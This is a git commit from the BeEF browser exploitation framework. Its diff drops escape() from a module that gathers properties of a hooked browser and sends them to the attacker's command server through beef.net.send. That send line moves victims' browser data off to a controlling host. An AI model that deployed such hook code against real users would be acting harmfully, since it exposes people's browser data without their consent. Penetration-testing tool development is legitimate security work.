Removed all remaining escape()'s on module returns. The network stack handles this magically now. (Fixes issue 302)

git-svn-id: https://beef.googlecode.com/svn/trunk@965 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
passbe
2011-05-10 23:46:48 +00:00
parent 33052a58b6
commit 06b4d56ed1
6 changed files with 7 additions and 7 deletions

View File

@@ -8,7 +8,7 @@ beef.execute(function() {
result+= n + " " + e[n] + "\n";
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});